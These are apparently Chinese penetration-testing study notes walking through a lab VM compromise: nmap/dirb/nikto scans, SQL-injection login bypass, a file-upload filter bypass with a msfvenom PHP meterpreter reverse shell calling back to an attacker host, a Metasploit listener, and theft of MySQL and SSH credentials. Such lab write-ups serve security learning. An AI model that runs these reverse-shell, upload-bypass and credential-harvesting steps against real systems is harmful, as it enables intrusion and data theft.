渗透学习笔记

渗透靶机进行提权

1 获取靶机相关信息

 nmap -sV 192.168.222.131
 ***
 Starting Nmap 7.80 ( https://nmap.org ) at 2021-10-20 03:09 EDT
 Nmap scan report for localhost (192.168.222.131)
 Host is up (0.000067s latency).
 Not shown: 997 closed ports
 PORT   STATE SERVICE VERSION
 21/tcp open  ftp     vsftpd 3.0.2
 22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
 80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
 MAC Address: 00:0C:29:97:47:75 (VMware)
 Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
 ​
 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
 Nmap done: 1 IP address (1 host up) scanned in 6.92 seconds
 ***
 ​

 nmap -A -v -T4 192.168.222.131
 ​
 ***
 Starting Nmap 7.80 ( https://nmap.org ) at 2021-10-20 03:11 EDT
 NSE: Loaded 151 scripts for scanning.
 NSE: Script Pre-scanning.
 Initiating NSE at 03:11
 Completed NSE at 03:11, 0.00s elapsed
 Initiating NSE at 03:11
 Completed NSE at 03:11, 0.00s elapsed
 Initiating NSE at 03:11
 Completed NSE at 03:11, 0.00s elapsed
 Initiating ARP Ping Scan at 03:11
 Scanning 192.168.222.131 [1 port]
 Completed ARP Ping Scan at 03:11, 0.03s elapsed (1 total hosts)
 Initiating Parallel DNS resolution of 1 host. at 03:11
 Completed Parallel DNS resolution of 1 host. at 03:11, 0.00s elapsed
 Initiating SYN Stealth Scan at 03:11
 Scanning localhost (192.168.222.131) [1000 ports]
 Discovered open port 80/tcp on 192.168.222.131
 Discovered open port 21/tcp on 192.168.222.131
 Discovered open port 22/tcp on 192.168.222.131
 Completed SYN Stealth Scan at 03:11, 0.12s elapsed (1000 total ports)
 Initiating Service scan at 03:11
 Scanning 3 services on localhost (192.168.222.131)
 Completed Service scan at 03:11, 6.01s elapsed (3 services on 1 host)
 Initiating OS detection (try #1) against localhost (192.168.222.131)
 NSE: Script scanning 192.168.222.131.
 Initiating NSE at 03:11
 NSE: [ftp-bounce] PORT response: 500 Illegal PORT command.
 Completed NSE at 03:11, 3.51s elapsed
 Initiating NSE at 03:11
 Completed NSE at 03:11, 0.00s elapsed
 Initiating NSE at 03:11
 Completed NSE at 03:11, 0.00s elapsed
 Nmap scan report for localhost (192.168.222.131)
 Host is up (0.00014s latency).
 Not shown: 997 closed ports
 PORT   STATE SERVICE VERSION
 21/tcp open ftp     vsftpd 3.0.2
 |_ftp-anon: Anonymous FTP login allowed (FTP code 230)
 | ftp-syst:
 |   STAT:
 | FTP server status:
 |     Connected to 192.168.222.128
 |     Logged in as ftp
 |     TYPE: ASCII
 |     No session bandwidth limit
 |     Session timeout in seconds is 600
 |     Control connection is plain text
 |     Data connections will be plain text
 |     At session startup, client count was 3
 |     vsFTPd 3.0.2 - secure, fast, stable
 |_End of status
 22/tcp open ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
 | ssh-hostkey:
 |   1024 d6:18:d9:ef:75:d3:1c:29:be:14:b5:2b:18:54:a9:c0 (DSA)
 |   2048 ee:8c:64:87:44:39:53:8c:24:fe:9d:39:a9:ad:ea:db (RSA)
 |   256 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4 (ECDSA)
 |_ 256 b2:8b:e2:46:5c:ef:fd:dc:72:f7:10:7e:04:5f:25:85 (ED25519)
 80/tcp open http   Apache httpd 2.4.7 ((Ubuntu))
 | http-methods:
 |_ Supported Methods: GET HEAD POST OPTIONS
 |_http-server-header: Apache/2.4.7 (Ubuntu)
 |_http-title: BTRisk
 MAC Address: 00:0C:29:97:47:75 (VMware)
 Device type: general purpose
 Running: Linux 3.X|4.X
 OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
 OS details: Linux 3.2 - 4.9
 Uptime guess: 0.249 days (since Tue Oct 19 21:13:36 2021)
 Network Distance: 1 hop
 TCP Sequence Prediction: Difficulty=261 (Good luck!)
 IP ID Sequence Generation: All zeros
 Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
 ​
 TRACEROUTE
 HOP RTT     ADDRESS
 1   0.14 ms localhost (192.168.222.131)
 ​
 NSE: Script Post-scanning.
 Initiating NSE at 03:11
 Completed NSE at 03:11, 0.00s elapsed
 Initiating NSE at 03:11
 Completed NSE at 03:11, 0.00s elapsed
 Initiating NSE at 03:11
 Completed NSE at 03:11, 0.00s elapsed
 Read data files from: /usr/bin/../share/nmap
 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
 Nmap done: 1 IP address (1 host up) scanned in 11.41 seconds
      Raw packets sent: 1023 (45.806KB) | Rcvd: 1015 (41.290KB)
 ***

2.发现存在80端口，扫描其网页目录

 dirb http://192.168.222.131
 ​
 ***
 -----------------
 DIRB v2.22
 By The Dark Raver
 -----------------
 ​
 START_TIME: Wed Oct 20 03:21:34 2021
 URL_BASE: http://192.168.222.131/
 WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
 ​
 -----------------
 ​
 GENERATED WORDS: 4612
 ​
 ---- Scanning URL: http://192.168.222.131/ ----
 ==> DIRECTORY: http://192.168.222.131/assets/
 + http://192.168.222.131/index.php (CODE:200|SIZE:758)
 ==> DIRECTORY: http://192.168.222.131/javascript/
 + http://192.168.222.131/server-status (CODE:403|SIZE:295)
 ==> DIRECTORY: http://192.168.222.131/uploads/
 ​
 ---- Entering directory: http://192.168.222.131/assets/ ----
 (!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)
 ​
 ---- Entering directory: http://192.168.222.131/javascript/ ----
 ==> DIRECTORY: http://192.168.222.131/javascript/jquery/
 ​
 ---- Entering directory: http://192.168.222.131/uploads/ ----
 (!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)
 ​
 ---- Entering directory: http://192.168.222.131/javascript/jquery/ ----
 + http://192.168.222.131/javascript/jquery/jquery (CODE:200|SIZE:252879)
 + http://192.168.222.131/javascript/jquery/version (CODE:200|SIZE:5)
 ​
 -----------------
 END_TIME: Wed Oct 20 03:21:42 2021
 DOWNLOADED: 13836 - FOUND: 4
 ​
 ***

 ​
 nikto -host IP:PORT(如果是80端口，可以不加端口号)
 nikto -host 192.168.222.131
 ​
 ***
 - Nikto v2.1.6
 ---------------------------------------------------------------------------
 + Target IP:          192.168.222.131
 + Target Hostname:    192.168.222.131
 + Target Port:        80
 + Start Time:         2021-10-20 03:25:17 (GMT-4)
 ---------------------------------------------------------------------------
 + Server: Apache/2.4.7 (Ubuntu)
 + Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.21
 + The anti-clickjacking X-Frame-Options header is not present.
 + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
 + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
 + No CGI Directories found (use '-C all' to force check all possible dirs)
 + Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
 + Web Server returns a valid response with junk HTTP methods, this may cause false positives.
 + /config.php: PHP Config file may contain database IDs and passwords.
  #php的配置文件,会有sql的账户以及密码文件
 + OSVDB-3233: /icons/README: Apache default file found.
 + /login.php: Admin login page/section found.
 + 7915 requests: 0 error(s) and 9 item(s) reported on remote host
 + End Time:           2021-10-20 03:26:10 (GMT-4) (53 seconds)
 ---------------------------------------------------------------------------
 + 1 host(s) tested 
 ***

2、登陆目标靶机login页面

定义了用户的值，将值赋值到了user变量中，密码，赋值到了pwd变量。str是user用户和子字符串，从用户名最后一个出现@符号+1 开始，一直到user的结束。

可以发现pwd==" ' "如果密码等于单引号会提示黑客入侵，可以联想到sql注入，使用fuzz模糊测试是否存在sql注入

绕过登录认证机制

web模糊测试字典位置 /usr/share/wordlists/wfuzz

burp爆破

爆破出来些sql注入的密码

访问burp的网页链接

http://burp/show/2/z04tysv5yakgkqk89wm5h4owdubpursu

3、发现这是个文件上传页面

检测不出来php页面

只能检测出来jpg，该网页对上传内容进行了限制

通过抓包进行修改上传PHP

 利用msf创建一个可以回弹的shell
 ​
 msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.222.128(攻击机) lport=4444(端口) -f raw > /root/shell.php(文件路径&文件名)
 修改shell,将注释符删去

 将shell.php重命名为shell.jpg     #绕过登录验证
 在利用burpsuite进行抓包更改绕过验证，以实现绕过
 上传成功

通过倾听端口方式回弹shell

1、利用msf进行监听

 msfconsole     //打开msf工具
 use exploit/multi/handler
 set payload php/meterpreter/reverse_tcp    //设置payload
 set lhost 192.168.222.128      //回弹的IP地址
 set lport 4444         //回弹的端口

网页点开payload页面

回弹成功

 sysinfo   //查看系统配置
 查看config.php的配置文件
 查看出mysql的信息.账户和密码

 mysql -u root -p  //登录mysql
 show databases;  //查看sql信息,发现权限不够
 python -c "import pty;pty.spawn('/bin/bash')"  //python提供pty模块,一行脚本就可以创建一个原生的终端
 利用原生的终端进行登录mysql,查看mysql的内容
 mysql -u root -p
 输入密码:toor
 show databases;    //查看当前的数据库列表
 use  deneme;      //使用deneme数据库
 select * from user;   //查看表中信息
 查看到用户名以及密码
 使用ssh登录
 ​